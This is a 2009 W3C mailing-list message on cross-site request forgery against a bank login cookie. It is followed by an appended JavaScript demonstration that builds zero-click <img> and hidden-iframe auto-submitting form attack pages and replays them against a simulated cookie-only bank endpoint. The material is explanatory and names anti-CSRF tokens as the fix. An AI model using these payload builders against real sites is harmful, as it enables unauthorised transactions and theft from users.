- From: Mike Wilson <mikewse@hotmail.com>
- Date: Mon, 8 Jun 2009 17:50:48 +0200
- To: "'Giovanni Campagna'" <scampa.giovanni@gmail.com>, <public-webapps@w3.org>
Giovanni Campagna wrote:
> 1) user visits http://www.mybank.com/login
> 2) the server sends a cookie, call it MyBankSID, with the
> login information
> 3) user visits http://www.dangerous.com/ within the
> expiration time of the cookie
> 4) the user clicks a link (or sends a form) to
> http://www.mybank.com/pay?to=hacker
> 5) the browser sends the MyBankSID cookie, which grants access to the user's
> bank account
> 6) money goes from the user to the attacker

There is actually no need for user action in (4) to be hit by the security leak. If the protected URL can be called with GET then it is enough for www.dangerous.com to include, for example, an <img src="http://www.mybank.com/pay?to=hacker"> and the victim's browser will happily send the request together with the secret cookie at page load time. If POST is required then it can be done by script and a hidden iframe, also at page load time.

Best regards
Mike Wilson
Received on Monday, 8 June 2009 15:51:33 UTC
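The two zero-click deliveries Mike Wilson describes, as an added example that is not part of the original thread: one function builds the attacker page for the GET variant (a 1x1 `<img>` whose `src` is the payment URL) and one for the POST variant (a form that script submits into a hidden iframe on load). Beside them sits a model of the vulnerable bank endpoint, which authorises on the MyBankSID cookie alone, and a minimal model of the victim's browser, which attaches the cookies it holds for www.mybank.com to any request for that host regardless of which page caused it. The host names come from the thread; the `amount` parameter, the session id and the balance are constructed for illustration.

```javascript
// Added example, not code from the original thread. Models the GET (<img>)
// and POST (hidden iframe + auto-submitted form) CSRF deliveries against a
// bank endpoint whose only authorisation check is the session cookie.
// The 'amount' parameter, session id and balance are constructed values.

// Attacker page, GET variant: the browser fetches the <img> at page load
// and attaches whatever cookies it holds for www.mybank.com.
function buildGetAttackPage(targetUrl) {
  return [
    '<!doctype html><html><body>',
    `<img src="${targetUrl}" alt="" width="1" height="1">`,
    '</body></html>',
  ].join('\n');
}

// Attacker page, POST variant: a form posts into a hidden iframe and script
// submits it on load, so again no user interaction is required.
function buildPostAttackPage(actionUrl, fields) {
  const inputs = Object.entries(fields)
    .map(([name, value]) => `<input type="hidden" name="${name}" value="${value}">`)
    .join('\n');
  return [
    '<!doctype html><html><body>',
    '<iframe name="sink" style="display:none"></iframe>',
    `<form id="f" method="POST" action="${actionUrl}" target="sink">`,
    inputs,
    '</form>',
    '<script>document.getElementById("f").submit();</script>',
    '</body></html>',
  ].join('\n');
}

// Vulnerable bank with one constructed session and one account.
function makeBank() {
  const sessions = new Map([['s3cr3t-sid', 'alice']]);
  const balances = new Map([['alice', 1000]]);

  function parseCookies(header) {
    const jar = {};
    for (const part of header.split(';')) {
      const [k, ...rest] = part.trim().split('=');
      if (k) jar[k] = rest.join('=');
    }
    return jar;
  }

  // /pay accepts GET or POST. Its only check is a valid MyBankSID cookie,
  // so a forged cross-site request carrying that cookie is processed
  // exactly like one the user made on purpose.
  function handlePay(req) {
    const sid = parseCookies(req.headers.cookie || '').MyBankSID;
    const user = sessions.get(sid);
    if (!user) return { status: 401, body: 'login required' };
    const params = req.method === 'GET'
      ? new URL(req.url).searchParams
      : new URLSearchParams(req.body || '');
    const to = params.get('to');
    const amount = Number(params.get('amount'));
    if (!to || !Number.isInteger(amount) || amount <= 0) {
      return { status: 400, body: 'bad request' };
    }
    balances.set(user, balances.get(user) - amount);
    return { status: 200, body: `paid ${amount} to ${to}` };
  }

  return { handlePay, balanceOf: (u) => balances.get(u) };
}

// Minimal victim browser: adds the Cookie header for any host it has
// cookies for, no matter which page issued the request.
function browserRequest(cookieJar, method, url, body) {
  const host = new URL(url).host;
  const headers = {};
  if (cookieJar[host]) headers.cookie = cookieJar[host];
  return { method, url, headers, body };
}

// Replays the network effect of both attack pages and a cookie-less control.
function runScenario() {
  const bank = makeBank();
  const jar = { 'www.mybank.com': 'MyBankSID=s3cr3t-sid' }; // set at login (step 2)

  // GET variant: loading dangerous.com triggers the <img> fetch.
  const getUrl = 'http://www.mybank.com/pay?to=hacker&amount=100';
  const getPage = buildGetAttackPage(getUrl);
  const r1 = bank.handlePay(browserRequest(jar, 'GET', getUrl));
  const afterGet = bank.balanceOf('alice');

  // POST variant: the hidden form submits an equivalent payment.
  const postPage = buildPostAttackPage('http://www.mybank.com/pay', { to: 'hacker', amount: '250' });
  const r2 = bank.handlePay(
    browserRequest(jar, 'POST', 'http://www.mybank.com/pay', 'to=hacker&amount=250'));
  const afterPost = bank.balanceOf('alice');

  // Control: the same request from a browser without the cookie is refused.
  const r3 = bank.handlePay(browserRequest({}, 'GET', getUrl));

  return { getPage, postPage, r1, r2, r3, afterGet, afterPost };
}

console.log(JSON.stringify(runScenario(), null, 2));
```

Run it with `node` to see both forged requests succeed and drain the constructed balance while the cookie-less control gets 401. Requiring POST changes nothing here, as the thread says: the server cannot tell the hidden-iframe submission from a real one, because the cookie is the only credential and the browser supplies it either way. The conventional remedy, outside the scope of this message, is to require a second value the attacker page cannot read or forge, such as a per-session anti-CSRF token in the form body.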